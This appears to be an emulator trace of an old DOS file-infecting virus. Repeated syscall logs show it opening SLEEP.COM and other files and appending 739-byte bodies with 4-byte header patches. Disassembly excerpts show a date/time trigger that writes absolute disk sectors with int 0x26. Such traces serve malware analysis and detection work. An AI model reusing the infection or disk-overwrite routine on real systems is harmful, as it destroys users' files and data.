2018-12-25T11:58:32.375825514Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.384170536Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.393472749Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.396944386Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.405267664Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.412544781Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.414188046Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.417798994Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.426607035Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.427906101Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.436839866Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.445979957Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.448648023Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.456187644Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.464257209Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.465722563Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.468805168Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.478283714Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.480096037Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.487484529Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.497094526Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.500015633Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.508222708Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.516067318Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.517591596Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.520518233Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.530980275Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.532651705Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.540065931Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.550085065Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.553414718Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.560908273Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.56827235Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.570093195Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.574440007Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.583142003Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.585260596Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.592402435Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.601583371Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.604851733Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:32.607395441Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:32.609763679Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:32.614628436Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:32.620910168Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:32.796961142Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:32.805192955Z 78 PC: 12afb | Find first file
2018-12-25T11:58:32.812060086Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:32.819284915Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:32.826533254Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:32.828090966Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.830930983Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:32.84689298Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:32.84861756Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.855735819Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.86446723Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.867356268Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.875114863Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.881897187Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.883537511Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.886412342Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.895199567Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.897142159Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.904562656Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.914557627Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.91837526Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.925605577Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.933068191Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.941047822Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.944019481Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.953475856Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.955726601Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.96438415Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.973650154Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.975740905Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.980873417Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.987700153Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.989143865Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.992150197Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.000981999Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.003482454Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.010441288Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.016247924Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.020234594Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.032328998Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.040100389Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.041920447Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.048065999Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.056950587Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.05836955Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.066116759Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.077107235Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.080528468Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.087622092Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.09506771Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.096527788Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.099277366Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.108694391Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.11016649Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.118647569Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.128720211Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.131630461Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.139381626Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.148680334Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.150914485Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.154386297Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.17513423Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.177229807Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.184198466Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.193378833Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.19658632Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.198838235Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.201092667Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.007264893Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.008745781Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.01321145Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.017814266Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.026894655Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.028321905Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.030933113Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.055835814Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.057473636Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.064033935Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.073093725Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.075727144Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.082420772Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.089269508Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.093311746Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.097976381Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.106377003Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.10848573Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.114867855Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.329052142Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.332393705Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.339629845Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.346871491Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.348817155Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.351308383Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.44372956Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.446122751Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.45433362Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.463186485Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.466803685Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.474448569Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.480285835Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.482576981Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.48538489Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.49218808Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.49425627Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.501210159Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.509510027Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.512634367Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.519646665Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.526131148Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.528035513Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.532564964Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.540563252Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.542190512Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.549542831Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.557433426Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.560000908Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.567220469Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.573451314Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.575170439Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.578860837Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.587704096Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.589019686Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.596305683Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.60418496Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.606649959Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.613664502Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.619846454Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.621154892Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.624382101Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.632044278Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.633397283Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.639832045Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.651467725Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.654177403Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.656541934Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.659165984Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.0400906Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.041123075Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.047628481Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.054522757Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.061583681Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.065110697Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.06799337Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.083178571Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.085591951Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.092763165Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.102006583Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.1062217Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.118349579Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.125376311Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.127124199Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.131022805Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.140418225Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.141968636Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.149852339Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.159089228Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.168279221Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.176427111Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.183744315Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.185420892Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.189594279Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.198446637Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.199708576Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.207738972Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.217327564Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.221066312Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.229019048Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.237645141Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.239814122Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.243863714Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.25345473Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.255067203Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.263547631Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.273073397Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.276364269Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.283533439Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.291123133Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.293090179Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.295971251Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.306159409Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.307795628Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.315259579Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.325407242Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.333020954Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.341148335Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.347240493Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.348767859Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.351862312Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.362032399Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.365046923Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.372644469Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.381934253Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.38538738Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.392668863Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.400518422Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.402565294Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.405449649Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.414220899Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.415774242Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.421016035Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.426184219Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.428085788Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.429822118Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.431291593Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.186452749Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.187780449Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.193916016Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.198311913Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.203326715Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.204585605Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.207703633Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.440068905Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.441527971Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.44796357Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.458550546Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.463047829Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.469742798Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.476179403Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.478496082Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.481891528Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.48994383Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.492219643Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.498582993Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.506672826Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.510655097Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.517012505Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.523339622Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.533400333Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.536156654Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.551180397Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.553659419Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.561217429Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.569480373Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.573201345Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.579604848Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.586499741Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.588810727Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.591819464Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.600264343Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.602231114Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.608918717Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.616796656Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.619535506Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.628077783Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.63426665Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.635576755Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.641380242Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.649209539Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.650614211Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.65757647Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.665454089Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.668437389Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.675640392Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.681740646Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.683024491Z 64 PC: 12b41 | Write file or device (See above)
